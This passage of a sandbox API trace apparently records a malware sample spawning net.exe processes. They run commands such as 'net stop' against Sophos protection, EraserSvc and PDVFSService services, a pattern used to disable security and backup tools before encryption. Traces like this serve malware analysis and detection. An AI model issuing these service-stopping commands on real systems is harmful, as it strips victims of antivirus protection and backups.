(hMem=0x543f98) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x33 [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0038.511] LocalFree (hMem=0x543f98) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*㾘T龜*") returned 0x234 [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0038.511] LocalFree (hMem=0x54b888) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*뢈T龜*") returned 0x13 [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.511] LocalFree (hMem=0x543f98) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.511] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x16 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㶰T⡋瓢琉*㾘T龜*") returned 0x11 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543db0) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㶰T龜*") returned 0x14 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x12 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0xf [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x17 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x18 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x2a [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0038.512] LocalFree (hMem=0x543f98) returned 0x0 [0038.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.512] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0038.513] GetFileType (hFile=0x26c) returned 0x3 [0038.513] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x2af92c | out: lpMode=0x2af92c) returned 0 [0038.514] GetConsoleOutputCP () returned 0x1b5 [0038.514] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0038.514] malloc (_Size=0x16) returned 0x1e2758 [0038.514] GetConsoleOutputCP () returned 0x1b5 [0038.514] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x1e2758, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0038.514] WriteFile (in: hFile=0x26c, lpBuffer=0x1e2758*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x2af930, lpOverlapped=0x0 | out: lpBuffer=0x1e2758*, lpNumberOfBytesWritten=0x2af930*=0x15, lpOverlapped=0x0) returned 1 [0038.514] free (_Block=0x1e2758) [0038.514] LocalFree (hMem=0x543f98) returned 0x0 [0038.515] NetApiBufferFree (Buffer=0x541cb8) returned 0x0 [0038.515] NetApiBufferFree (Buffer=0x541cd0) returned 0x0 [0038.515] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos System Protection ServiceΓÇ¥ /y" [0038.515] exit (_Code=1) Process: id = "33" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x48d28000" os_pid = "0xbb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop EraserSvc11710 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 101 os_tid = 0xbb8 Process: id = "34" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4918a000" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0xbb4" cmd_line = "C:\\Windows\\system32\\net1 stop EraserSvc11710 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 102 os_tid = 0xbc0 [0038.688] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29fe64 | out: lpSystemTimeAsFileTime=0x29fe64*(dwLowDateTime=0xe14290a0, dwHighDateTime=0x1d57a86)) [0038.689] GetCurrentProcessId () returned 0xbbc [0038.689] GetCurrentThreadId () returned 0xbc0 [0038.689] GetTickCount () returned 0x1144ad6 [0038.689] QueryPerformanceCounter (in: lpPerformanceCount=0x29fe5c | out: lpPerformanceCount=0x29fe5c*=15897327584) returned 1 [0038.689] GetModuleHandleA (lpModuleName=0x0) returned 0x7d0000 [0038.689] __set_app_type (_Type=0x1) [0038.689] __p__fmode () returned 0x74eb31f4 [0038.689] __p__commode () returned 0x74eb31fc [0038.689] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7dffe6) returned 0x0 [0038.689] __getmainargs (in: _Argc=0x7e9064, _Argv=0x7e906c, _Env=0x7e9068, _DoWildCard=0, _StartInfo=0x7e9024 | out: _Argc=0x7e9064, _Argv=0x7e906c, _Env=0x7e9068) returned 0 [0038.689] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.689] GetConsoleOutputCP () returned 0x1b5 [0038.709] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7e9080 | out: lpCPInfo=0x7e9080) returned 1 [0038.709] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.712] sprintf_s (in: _DstBuf=0x29fe1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0038.712] setlocale (category=0, locale=".437") returned="English_United States.437" [0038.714] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0038.714] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0038.714] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EraserSvc11710 /y" [0038.714] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29fbe8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0038.714] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x70) returned 0x513c18 [0038.715] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0038.715] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fdec | out: Buffer=0x29fdec*=0x511c78) returned 0x0 [0038.715] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fdec | out: Buffer=0x29fdec*=0x511c90) returned 0x0 [0038.715] _fileno (_File=0x74eb2900) returned -2 [0038.715] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0038.715] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0038.715] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0038.715] _wcsicmp (_String1="config", _String2="stop") returned -16 [0038.715] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0038.715] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0038.715] _wcsicmp (_String1="file", _String2="stop") returned -13 [0038.715] _wcsicmp (_String1="files", _String2="stop") returned -13 [0038.715] _wcsicmp (_String1="group", _String2="stop") returned -12 [0038.715] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0038.715] _wcsicmp (_String1="help", _String2="stop") returned -11 [0038.715] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0038.715] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0038.715] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0038.715] _wcsicmp (_String1="session", _String2="stop") returned -15 [0038.715] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0038.715] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0038.715] _wcsicmp (_String1="share", _String2="stop") returned -12 [0038.716] _wcsicmp (_String1="start", _String2="stop") returned -14 [0038.716] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0038.716] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0038.716] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0038.716] _wcsicmp (_String1="accounts", _String2="EraserSvc11710") returned -4 [0038.716] _wcsicmp (_String1="computer", _String2="EraserSvc11710") returned -2 [0038.716] _wcsicmp (_String1="config", _String2="EraserSvc11710") returned -2 [0038.716] _wcsicmp (_String1="continue", _String2="EraserSvc11710") returned -2 [0038.716] _wcsicmp (_String1="cont", _String2="EraserSvc11710") returned -2 [0038.716] _wcsicmp (_String1="file", _String2="EraserSvc11710") returned 1 [0038.716] _wcsicmp (_String1="files", _String2="EraserSvc11710") returned 1 [0038.716] _wcsicmp (_String1="group", _String2="EraserSvc11710") returned 2 [0038.716] _wcsicmp (_String1="groups", _String2="EraserSvc11710") returned 2 [0038.716] _wcsicmp (_String1="help", _String2="EraserSvc11710") returned 3 [0038.716] _wcsicmp (_String1="helpmsg", _String2="EraserSvc11710") returned 3 [0038.716] _wcsicmp (_String1="localgroup", _String2="EraserSvc11710") returned 7 [0038.716] _wcsicmp (_String1="pause", _String2="EraserSvc11710") returned 11 [0038.716] _wcsicmp (_String1="session", _String2="EraserSvc11710") returned 14 [0038.716] _wcsicmp (_String1="sessions", _String2="EraserSvc11710") returned 14 [0038.716] _wcsicmp (_String1="sess", _String2="EraserSvc11710") returned 14 [0038.716] _wcsicmp (_String1="share", _String2="EraserSvc11710") returned 14 [0038.716] _wcsicmp (_String1="start", _String2="EraserSvc11710") returned 14 [0038.716] _wcsicmp (_String1="stats", _String2="EraserSvc11710") returned 14 [0038.716] _wcsicmp (_String1="statistics", _String2="EraserSvc11710") returned 14 [0038.716] _wcsicmp (_String1="stop", _String2="EraserSvc11710") returned 14 [0038.716] _wcsicmp (_String1="time", _String2="EraserSvc11710") returned 15 [0038.716] _wcsicmp (_String1="user", _String2="EraserSvc11710") returned 16 [0038.716] _wcsicmp (_String1="users", _String2="EraserSvc11710") returned 16 [0038.716] _wcsicmp (_String1="msg", _String2="EraserSvc11710") returned 8 [0038.716] _wcsicmp (_String1="messenger", _String2="EraserSvc11710") returned 8 [0038.716] _wcsicmp (_String1="receiver", _String2="EraserSvc11710") returned 13 [0038.716] _wcsicmp (_String1="rcv", _String2="EraserSvc11710") returned 13 [0038.716] _wcsicmp (_String1="netpopup", _String2="EraserSvc11710") returned 9 [0038.716] _wcsicmp (_String1="redirector", _String2="EraserSvc11710") returned 13 [0038.716] _wcsicmp (_String1="redir", _String2="EraserSvc11710") returned 13 [0038.717] _wcsicmp (_String1="rdr", _String2="EraserSvc11710") returned 13 [0038.717] _wcsicmp (_String1="workstation", _String2="EraserSvc11710") returned 18 [0038.717] _wcsicmp (_String1="work", _String2="EraserSvc11710") returned 18 [0038.717] _wcsicmp (_String1="wksta", _String2="EraserSvc11710") returned 18 [0038.717] _wcsicmp (_String1="prdr", _String2="EraserSvc11710") returned 11 [0038.717] _wcsicmp (_String1="devrdr", _String2="EraserSvc11710") returned -1 [0038.717] _wcsicmp (_String1="lanmanworkstation", _String2="EraserSvc11710") returned 7 [0038.717] _wcsicmp (_String1="server", _String2="EraserSvc11710") returned 14 [0038.717] _wcsicmp (_String1="svr", _String2="EraserSvc11710") returned 14 [0038.717] _wcsicmp (_String1="srv", _String2="EraserSvc11710") returned 14 [0038.717] _wcsicmp (_String1="lanmanserver", _String2="EraserSvc11710") returned 7 [0038.717] _wcsicmp (_String1="alerter", _String2="EraserSvc11710") returned -4 [0038.717] _wcsicmp (_String1="netlogon", _String2="EraserSvc11710") returned 9 [0038.717] _wcsupr (in: _String="EraserSvc11710" | out: _String="ERASERSVC11710") returned="ERASERSVC11710" [0038.717] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5154d8 [0038.720] GetServiceKeyNameW (in: hSCManager=0x5154d8, lpDisplayName="ERASERSVC11710", lpServiceName=0x7eaaf0, lpcchBuffer=0x29fd88 | out: lpServiceName="", lpcchBuffer=0x29fd88) returned 0 [0038.720] _wcsicmp (_String1="msg", _String2="ERASERSVC11710") returned 8 [0038.720] _wcsicmp (_String1="messenger", _String2="ERASERSVC11710") returned 8 [0038.720] _wcsicmp (_String1="receiver", _String2="ERASERSVC11710") returned 13 [0038.720] _wcsicmp (_String1="rcv", _String2="ERASERSVC11710") returned 13 [0038.720] _wcsicmp (_String1="redirector", _String2="ERASERSVC11710") returned 13 [0038.720] _wcsicmp (_String1="redir", _String2="ERASERSVC11710") returned 13 [0038.720] _wcsicmp (_String1="rdr", _String2="ERASERSVC11710") returned 13 [0038.720] _wcsicmp (_String1="workstation", _String2="ERASERSVC11710") returned 18 [0038.720] _wcsicmp (_String1="work", _String2="ERASERSVC11710") returned 18 [0038.720] _wcsicmp (_String1="wksta", _String2="ERASERSVC11710") returned 18 [0038.720] _wcsicmp (_String1="prdr", _String2="ERASERSVC11710") returned 11 [0038.720] _wcsicmp (_String1="devrdr", _String2="ERASERSVC11710") returned -1 [0038.721] _wcsicmp (_String1="lanmanworkstation", _String2="ERASERSVC11710") returned 7 [0038.721] _wcsicmp (_String1="server", _String2="ERASERSVC11710") returned 14 [0038.721] _wcsicmp (_String1="svr", _String2="ERASERSVC11710") returned 14 [0038.721] _wcsicmp (_String1="srv", _String2="ERASERSVC11710") returned 14 [0038.721] _wcsicmp (_String1="lanmanserver", _String2="ERASERSVC11710") returned 7 [0038.721] _wcsicmp (_String1="alerter", _String2="ERASERSVC11710") returned -4 [0038.721] _wcsicmp (_String1="netlogon", _String2="ERASERSVC11710") returned 9 [0038.721] NetServiceControl (in: servername=0x0, service="ERASERSVC11710", opcode=0x0, arg=0x0, bufptr=0x29fd84 | out: bufptr=0x29fd84) returned 0x889 [0038.722] wcscpy_s (in: _Destination=0x7ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0038.722] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0038.722] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x7eb338, nSize=0x800, Arguments=0x7e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0038.723] GetFileType (hFile=0x26c) returned 0x3 [0038.723] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x514008 [0038.723] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x514008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0038.723] WriteFile (in: hFile=0x26c, lpBuffer=0x514008*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29fcc4, lpOverlapped=0x0 | out: lpBuffer=0x514008*, lpNumberOfBytesWritten=0x29fcc4*=0x1e, lpOverlapped=0x0) returned 1 [0038.724] LocalFree (hMem=0x514008) returned 0x0 [0038.724] GetFileType (hFile=0x26c) returned 0x3 [0038.724] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5162b0 [0038.724] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5162b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nQ", lpUsedDefaultChar=0x0) returned 2 [0038.724] WriteFile (in: hFile=0x26c, lpBuffer=0x5162b0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fcc4, lpOverlapped=0x0 | out: lpBuffer=0x5162b0*, lpNumberOfBytesWritten=0x29fcc4*=0x2, lpOverlapped=0x0) returned 1 [0038.724] LocalFree (hMem=0x5162b0) returned 0x0 [0038.724] _ultow (in: _Dest=0x889, _Radix=2751732 | out: _Dest=0x889) returned="2185" [0038.724] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x7eb338, nSize=0x800, Arguments=0x7e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0038.724] GetFileType (hFile=0x26c) returned 0x3 [0038.724] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5162b0 [0038.724] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5162b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0038.724] WriteFile (in: hFile=0x26c, lpBuffer=0x5162b0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x29fcd0, lpOverlapped=0x0 | out: lpBuffer=0x5162b0*, lpNumberOfBytesWritten=0x29fcd0*=0x34, lpOverlapped=0x0) returned 1 [0038.724] LocalFree (hMem=0x5162b0) returned 0x0 [0038.724] GetFileType (hFile=0x26c) returned 0x3 [0038.724] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5162b0 [0038.724] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5162b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nQ", lpUsedDefaultChar=0x0) returned 2 [0038.724] WriteFile (in: hFile=0x26c, lpBuffer=0x5162b0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fcd0, lpOverlapped=0x0 | out: lpBuffer=0x5162b0*, lpNumberOfBytesWritten=0x29fcd0*=0x2, lpOverlapped=0x0) returned 1 [0038.724] LocalFree (hMem=0x5162b0) returned 0x0 [0038.725] NetApiBufferFree (Buffer=0x511c78) returned 0x0 [0038.725] NetApiBufferFree (Buffer=0x511c90) returned 0x0 [0038.725] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EraserSvc11710 /y" [0038.725] exit (_Code=2) Process: id = "35" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4a22d000" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop PDVFSService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 103 os_tid = 0xbc8 Process: id = "36" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x48a55000" os_pid = "0xbcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0xbc4" cmd_line = "C:\\Windows\\system32\\net1 stop PDVFSService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 104 os_tid = 0xbd0 [0038.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10f9d8 | out: lpSystemTimeAsFileTime=0x10f9d8*(dwLowDateTime=0xe16d6960, dwHighDateTime=0x1d57a86)) [0038.961] GetCurrentProcessId () returned 0xbcc [0038.961] GetCurrentThreadId () returned 0xbd0 [0038.962] GetTickCount () returned 0x1144bef [0038.962] QueryPerformanceCounter (in: lpPerformanceCount=0x10f9d0 | out: lpPerformanceCount=0x10f9d0*=15924622305) returned 1 [0038.962] GetModuleHandleA (lpModuleName=0x0) returned 0xd10000 [0038.962] __set_app_type (_Type=0x1) [0038.962] __p__fmode () returned 0x74eb31f4 [0038.962] __p__commode () returned 0x74eb31fc [0038.962] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd1ffe6) returned 0x0 [0038.962] __getmainargs (in: _Argc=0xd29064, _Argv=0xd2906c, _Env=0xd29068, _DoWildCard=0, _StartInfo=0xd29024 | out: _Argc=0xd29064, _Argv=0xd2906c, _Env=0xd29068) returned 0 [0038.962] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.962] GetConsoleOutputCP () returned 0x1b5 [0038.962] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd29080 | out: lpCPInfo=0xd29080) returned 1 [0038.963] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.965] sprintf_s (in: _DstBuf=0x10f990, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0038.966] setlocale (category=0, locale=".437") returned="English_United States.437" [0038.968] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0038.968] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0038.968] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop PDVFSService /y" [0038.968] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f75c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0038.968] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x6c) returned 0x523c10 [0038.968] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0038.968] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10f960 | out: Buffer=0x10f960*=0x521c70) returned 0x0 [0038.968] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10f960 | out: Buffer=0x10f960*=0x521c88) returned 0x0 [0038.968] _fileno (_File=0x74eb2900) returned -2 [0038.968] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0038.968] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0038.968] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0038.968] _wcsicmp (_String1="config", _String2="stop") returned -16 [0038.968] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0038.968] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0038.968] _wcsicmp (_String1="file", _String2="stop") returned -13 [0038.968] _wcsicmp (_String1="files", _String2="stop") returned -13 [0038.968] _wcsicmp (_String1="group", _String2="stop") returned -12 [0038.968] _wcsicmp (_String1="groups", _String2="stop") returned -12 